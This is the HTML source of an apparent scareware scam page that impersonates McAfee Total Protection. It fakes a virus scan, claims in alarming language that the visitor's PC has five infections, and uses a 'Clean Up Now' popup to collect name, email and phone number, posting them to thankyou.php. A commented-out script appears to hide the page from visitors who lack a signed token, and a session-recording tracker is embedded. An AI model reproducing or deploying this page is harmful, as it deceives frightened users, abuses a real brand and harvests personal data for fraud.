﻿<!DOCTYPE html>
<html>

<head>
    	<meta charset="utf-8">
	<!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]-->
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
	<title>McAfee Total Protection</title>

	<meta name="description" content="McAfee Total Protection">
	<meta name="pushsdk" content="3ab0d8f58a755d061d3e8cf1f7a1f08d">
	<link rel="shortcut icon" href="files/images/favicon.png">

	<link rel="stylesheet" type="text/css" href="files/styles/default.css">
    <script src="ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="../css2?family=Roboto:wght@100;300;400;500;700&amp;display=swap" rel="stylesheet">

     <script src="files/script/smart.js"></script>
    <script src="files/script/lang.js"></script>
    <script src="files/script/myjs.js"></script>
    
    
    
    <!--script>(function(){!function(l){function r(b,a){var h=(65535&b)+(65535&a);return(b>>16)+(a>>16)+(h>>16)<<16|65535&h}function p(b,a,h,q,x,g){b=r(r(a,b),r(q,g));return r(b<<x|b>>>32-x,h)}function g(b,a,h,q,g,k,c){return p(a&h|~a&q,b,a,g,k,c)}function k(b,a,h,q,g,k,c){return p(a&q|h&~q,b,a,g,k,c)}function m(b,a,h,q,g,k,c){return p(a^h^q,b,a,g,k,c)}function n(b,a,h,q,g,k,c){return p(h^(a|~q),b,a,g,k,c)}function u(b,a){var h,q,l,p;b[a>>5]|=128<<a%32;b[14+(a+64>>>9<<4)]=a;var c=1732584193,d=-271733879,e=-1732584194,
f=271733878;for(a=0;a<b.length;a+=16)d=n(d=n(d=n(d=n(d=m(d=m(d=m(d=m(d=k(d=k(d=k(d=k(d=g(d=g(d=g(d=g(q=d,e=g(l=e,f=g(p=f,c=g(h=c,d,e,f,b[a],7,-680876936),d,e,b[a+1],12,-389564586),c,d,b[a+2],17,606105819),f,c,b[a+3],22,-1044525330),e=g(e,f=g(f,c=g(c,d,e,f,b[a+4],7,-176418897),d,e,b[a+5],12,1200080426),c,d,b[a+6],17,-1473231341),f,c,b[a+7],22,-45705983),e=g(e,f=g(f,c=g(c,d,e,f,b[a+8],7,1770035416),d,e,b[a+9],12,-1958414417),c,d,b[a+10],17,-42063),f,c,b[a+11],22,-1990404162),e=g(e,f=g(f,c=g(c,d,e,f,
b[a+12],7,1804603682),d,e,b[a+13],12,-40341101),c,d,b[a+14],17,-1502002290),f,c,b[a+15],22,1236535329),e=k(e,f=k(f,c=k(c,d,e,f,b[a+1],5,-165796510),d,e,b[a+6],9,-1069501632),c,d,b[a+11],14,643717713),f,c,b[a],20,-373897302),e=k(e,f=k(f,c=k(c,d,e,f,b[a+5],5,-701558691),d,e,b[a+10],9,38016083),c,d,b[a+15],14,-660478335),f,c,b[a+4],20,-405537848),e=k(e,f=k(f,c=k(c,d,e,f,b[a+9],5,568446438),d,e,b[a+14],9,-1019803690),c,d,b[a+3],14,-187363961),f,c,b[a+8],20,1163531501),e=k(e,f=k(f,c=k(c,d,e,f,b[a+13],
5,-1444681467),d,e,b[a+2],9,-51403784),c,d,b[a+7],14,1735328473),f,c,b[a+12],20,-1926607734),e=m(e,f=m(f,c=m(c,d,e,f,b[a+5],4,-378558),d,e,b[a+8],11,-2022574463),c,d,b[a+11],16,1839030562),f,c,b[a+14],23,-35309556),e=m(e,f=m(f,c=m(c,d,e,f,b[a+1],4,-1530992060),d,e,b[a+4],11,1272893353),c,d,b[a+7],16,-155497632),f,c,b[a+10],23,-1094730640),e=m(e,f=m(f,c=m(c,d,e,f,b[a+13],4,681279174),d,e,b[a],11,-358537222),c,d,b[a+3],16,-722521979),f,c,b[a+6],23,76029189),e=m(e,f=m(f,c=m(c,d,e,f,b[a+9],4,-640364487),
d,e,b[a+12],11,-421815835),c,d,b[a+15],16,530742520),f,c,b[a+2],23,-995338651),e=n(e,f=n(f,c=n(c,d,e,f,b[a],6,-198630844),d,e,b[a+7],10,1126891415),c,d,b[a+14],15,-1416354905),f,c,b[a+5],21,-57434055),e=n(e,f=n(f,c=n(c,d,e,f,b[a+12],6,1700485571),d,e,b[a+3],10,-1894986606),c,d,b[a+10],15,-1051523),f,c,b[a+1],21,-2054922799),e=n(e,f=n(f,c=n(c,d,e,f,b[a+8],6,1873313359),d,e,b[a+15],10,-30611744),c,d,b[a+6],15,-1560198380),f,c,b[a+13],21,1309151649),e=n(e,f=n(f,c=n(c,d,e,f,b[a+4],6,-145523070),d,e,b[a+
11],10,-1120210379),c,d,b[a+2],15,718787259),f,c,b[a+9],21,-343485551),c=r(c,h),d=r(d,q),e=r(e,l),f=r(f,p);return[c,d,e,f]}function t(b){var a,h="",g=32*b.length;for(a=0;a<g;a+=8)h+=String.fromCharCode(b[a>>5]>>>a%32&255);return h}function v(b){var a,h=[];h[(b.length>>2)-1]=void 0;for(a=0;a<h.length;a+=1)h[a]=0;var g=8*b.length;for(a=0;a<g;a+=8)h[a>>5]|=(255&b.charCodeAt(a/8))<<a%32;return h}function y(b){var a,h="";for(a=0;a<b.length;a+=1){var g=b.charCodeAt(a);h+="0123456789abcdef".charAt(g>>>4&
15)+"0123456789abcdef".charAt(15&g)}return h}function z(b){b=unescape(encodeURIComponent(b));return t(u(v(b),8*b.length))}function A(b,a){b=unescape(encodeURIComponent(b));a=unescape(encodeURIComponent(a));var h,g=v(b),k=[],l=[];k[15]=l[15]=void 0;16<g.length&&(g=u(g,8*b.length));for(b=0;16>b;b+=1)k[b]=909522486^g[b],l[b]=1549556828^g[b];return h=u(k.concat(v(a)),512+8*a.length),t(u(l.concat(h),640))}function w(b,a,g){return a?g?A(a,b):y(A(a,b)):g?z(b):y(z(b))}"function"==typeof define&&define.amd?
define(function(){return w}):"object"==typeof module&&module.exports?module.exports=w:l.md5=w}(this);var l=(new URLSearchParams(window.location.search)).get("lptoken");if(l){var t=l.substr(0,2)+l.substr(4,2)+l.substr(8,2)+l.substr(12,2)+l.substr(16,2);l=l.substr(2,2)+l.substr(6,2)+l.substr(10,2)+l.substr(14,2)+l.substr(18,2);var p=md5("iw32jmvw3e6bjgoom9gs5lzymuruccwh6s2gxir931sjn5jd"+t+navigator.userAgent);p=p.substr(0,2)+p.substr(5,2)+p.substr(12,2)+p.substr(19,2)+p.substr(26,2);if(Date.now()/1E3>Number(t)||p!==l)window&&window.stop()||
stop()}else window&&window.stop()||stop()})();
</script-->
    
    <style>
        /* ... (your existing CSS styles) ... */

        /* Style for the popup */
        .popup {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }

        .popup-content {
            background-color: white;
            padding: 20px;
            border-radius: 5px;
        }

        /* Additional styles for the form */
        .popup-form label {
            display: block;
            margin-bottom: 5px;
        }

        .popup-form input {
            width: 100%;
            padding: 10px;
            margin-bottom: 30px;
        }
        
        .stul{
            font-size: 23px;
    line-height: 10px;
    padding: 10px 17px 10px;
    font-weight: 500;
    height: 40px;
    box-sizing: border-box;
    box-shadow: 0px 0px 5px rgb(0 0 0 / 24%);
    color: #fff;
    background: #c01818;
        }
    </style>
    <!-- Begin Inspectlet Asynchronous Code -->
<script type="text/javascript">
(function() {
window.__insp = window.__insp || [];
__insp.push(['wid', 131055192]);
var ldinsp = function(){
if(typeof window.__inspld != "undefined") return; window.__inspld = 1; var insp = document.createElement('script'); insp.type = 'text/javascript'; insp.async = true; insp.id = "inspsync"; insp.src = ('https:' == document.location.protocol ? 'https' : 'http') + '://cdn.inspectlet.com/inspectlet.js?wid=131055192&r=' + Math.floor(new Date().getTime()/3600000); var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(insp, x); };
setTimeout(ldinsp, 0);
})();
</script>
<!-- End Inspectlet Asynchronous Code -->
</head>

<body>

    


    <header>

	<div class="container">
		<img src="files/images/logo.svg">

		<ul>
			<li><a href="#">Support</a></li> 
			<li><a><img src="files/images/country.svg"></a></li> 
			<li><a><b>Sign in</b></a></li>
		</ul>
	</div>
</header>



<section>
	<div class="container">
		<h3>Cyber threats are evolving. Our defense too.</h3>
		<button>McAfee Security Scan</button>

		<div class="complete">
			<img src="files/images/tlis.png">
			
			<h5><strong>Complete protection</strong> for your online life</h5>
			<p>With McAfee Security, extend your online protection and privacy with a simple, all-in-one security solution. Connect confidently from the palm of your hand wherever you go.</p>
		</div>
	</div>
</section>


<div class="main-first">

	<div class="head">
		<img src="files/images/favicon.png">
		McAfee Total Protection

		<span class="icons">
			<img src="files/images/icon_1.png">
			<img src="files/images/icon_2.png">
		</span>
	</div>

	<div class="body">
		<h1>Quick Scan</h1>
		<p>Scanning commonly infected areas and startup files...</p>

		<div class="progress">
              <div class="project">
                <div class="total">Total items scanned: <span id="cont">192746</span></div>
                
                <div class="green-red">
                  
                  <div class="move" percent="100"></div>
                </div>

              </div>
          </div>

          <div class="mix-wirds">
          	C:\Program Files\Windows Defender\MSASCuiL.exe
          </div>


         <div class="summa">
			Total security risks detected: <i class="tsrd">0</i>

			<table class="tab">
				<tbody>
					<tr class="one">
						<td class="table-1">1. Virus</td>
						<td>Win32/Hoax.Renos.HX</td>
						<td>Risk level: HIGH</td>
					</tr>
					
					<tr class="two">
						<td class="table-1">2. Virus</td>
						<td>Trojan IRC/Backdoor.sd</td>
						<td>Risk level: HIGH</td>
					</tr>
					
					<tr class="three">
						<td class="table-1">3. Adware</td>
						<td>Win32/Look2me.ab</td>
						<td>Risk level: Medium</td>
					</tr>
					
					<tr class="four">
						<td class="table-1">4. Virus </td>
						<td>Trojan Key logger</td>
						<td>Risk level: HIGH</td>
					</tr>

					<tr class="five">
						<td class="table-1">5. Malware</td>
						<td>Data crawler.exe  </td>
						<td>Risk level: Medium</td>
					</tr>
				</tbody>
			</table>
		</div>

		<div class="summa">
			[+] Total security risks resolved:  <i class="tsrr">0</i>
		</div>

		<div class="summa">
			Total security risks requiring attention:  <i class="tsrra">0</i>
		</div>
	</div>

	<img class="tog" src="files/images/together.png">

</div>





  
        <div class="main-second">
	<div class="head">
		<img src="files/images/atten.png">
		
  			Your PC is infected with 5 viruses!
  		

		<span class="icons">
			<a href="#"><img src="files/images/icon_3.png"></a>
			<a href="#"><img src="files/images/icon_4.png"></a>
		</span>
	</div>

	<div class="body">
	    
		<i><b>IMMEDIATE ACTION IS REQUIRED!</b></i>
		

		
		<i>Viruses found on this PC most likely track internet activity to collect banking details and login credentials. Unprotected PCs are 93% more vulnerable to suffer from malware.</i>
	</div>

	<!--<div class="url"><a href="#">Proceed...</a></div>-->
	<div class="url"><a href="#" id="popup-trigger">Clean Up Now</a></div>

</div>
        
    

    <!-- Popup -->
<div class="popup" id="popup">
    <div class="popup-content" style="width: 500px; height: 490px; display: flex; flex-direction: column; justify-content: center; align-items: center;">
        <h3 class="stul" style="margin-bottom: 0px; margin-top: 0px;">Your Antivirus Is Not Active!</h3>
        <h5 style="font-size:20px;text-align: center;">Your Antivirus Product Key Is Available Now: UIU77O8C-REE4Y7L5-XXXXXXX</h5>
        <p>Please fill the form to download your product key:</p>
        <form action='thankyou.php' method='post' enctype='multipart/form-data' class="popup-form" style="width: 100%; max-width: 400px;">
            <label for="name">Name:</label>
            <input type="text" name="name" id="name" aria-label="First name" aria-required="true" aria-invalid="false" placeholder="Your full name" required="" style="width: 100%; padding: 10px; margin-bottom: 10px;">

            <label for="email">Email:</label>
            <input name="email" id="email" type="text" class="medium" placeholder="Your email address" required="" style="width: 100%; padding: 10px; margin-bottom: 10px;">

            <label for="phone">Phone Number:</label>
            <input name="number" id="number" type="text" minlength="9" maxlength="15" class="medium" placeholder="Phone number" required="" style="width: 100%; padding: 10px; margin-bottom: 10px;">
            <br><br>

            <div style="display: flex; justify-content: center; width: 100%;">
                <button type="submit" id="" name="submit" style="padding: 10px; width: 50%;font-weight: 500;cursor:pointer;">DOWNLOAD</button>
            </div>
            <br>
            <br>
           

            <div style="display: flex; justify-content: center; width: 100%;">
                <img style="width: 90px;" src="files/images/logo.svg">
            </div>
            <br>
        </form>
    </div>
</div>










<div class="fly fly_1">
	<div class="head">
		<strong>Threat Detected!</strong>
		<i>Trojan.Fakealert.356</i>
	</div>

	<div class="body">
		<ul>
			<li>
				<img src="files/images/action_1.gif">
				High Risk
			</li>
			<li>
				<img src="files/images/action_2.gif">
				Origin
				<span>Not available</span>
			</li>
			<li>
				<img src="files/images/action_3.gif">
				Activity
				<span>Threat actions performed: 1</span>
			</li>
		</ul>
	</div>
</div>

<div class="fly fly_2">
	<div class="head">
		<strong>Threat Detected!</strong>
		<i>Trojan IRC/Backdor.Sd.FRV</i>
	</div>

	<div class="body">
		<ul>
			<li>
				<img src="files/images/action_1.gif">
				High Risk
			</li>
			<li>
				<img src="files/images/action_2.gif">
				Origin
				<span>Not available</span>
			</li>
			<li>
				<img src="files/images/action_3.gif">
				Activity
				<span>Threat actions performed: 1</span>
			</li>
		</ul>
	</div>
</div>

<div class="fly fly_3">
	<div class="head">
		<strong>Threat Detected!</strong>
		<i>Adware.Win32.Look2me.ab</i>
	</div>

	<div class="body">
		<ul>
			<li>
				<img src="files/images/action_1.gif">
				High Risk
			</li>
			<li>
				<img src="files/images/action_2.gif">
				Origin
				<span>Not available</span>
			</li>
			<li>
				<img src="files/images/action_3.gif">
				Activity
				<span>Threat actions performed: 1</span>
			</li>
		</ul>
	</div>
</div>

<div class="fly fly_4">
	<div class="head">
		<strong>Threat Detected!</strong>
		<i>Trojan.Qoologic - Key Logger</i>
	</div>

	<div class="body">
		<ul>
			<li>
				<img src="files/images/action_1.gif">
				High Risk
			</li>
			<li>
				<img src="files/images/action_2.gif">
				Origin
				<span>Not available</span>
			</li>
			<li>
				<img src="files/images/action_3.gif">
				Activity
				<span>Threat actions performed: 1</span>
			</li>
		</ul>
	</div>
</div>

<div class="fly fly_5">
	<div class="head">
		<strong>Threat Detected!</strong>
		<i>Trojan.Fakealert.356</i>
	</div>

	<div class="body">
		<ul>
			<li>
				<img src="files/images/action_1.gif">
				High Risk
			</li>
			<li>
				<img src="files/images/action_2.gif">
				Origin
				<span>Not available</span>
			</li>
			<li>
				<img src="files/images/action_3.gif">
				Activity
				<span>Threat actions performed: 1</span>
			</li>
		</ul>
	</div>
</div>


<span class="overflov"></span>
<span class="overflov_2"></span>

<script>
 setTimeout(function() {



}, 500);
</script>

<script>
        // Open the popup when "Proceed..." is clicked
        document.getElementById("popup-trigger").addEventListener("click", function (event) {
            event.preventDefault();
            document.getElementById("popup").style.display = "flex";
        });

        // Close the popup when the background is clicked
        document.querySelector(".popup").addEventListener("click", function (event) {
            if (event.target === this) {
                this.style.display = "none";
            }
        });

        // Prevent the popup from closing when the form is clicked
        document.querySelector(".popup-content").addEventListener("click", function (event) {
            event.stopPropagation();
        });
    </script>    
   

  
            </body></html>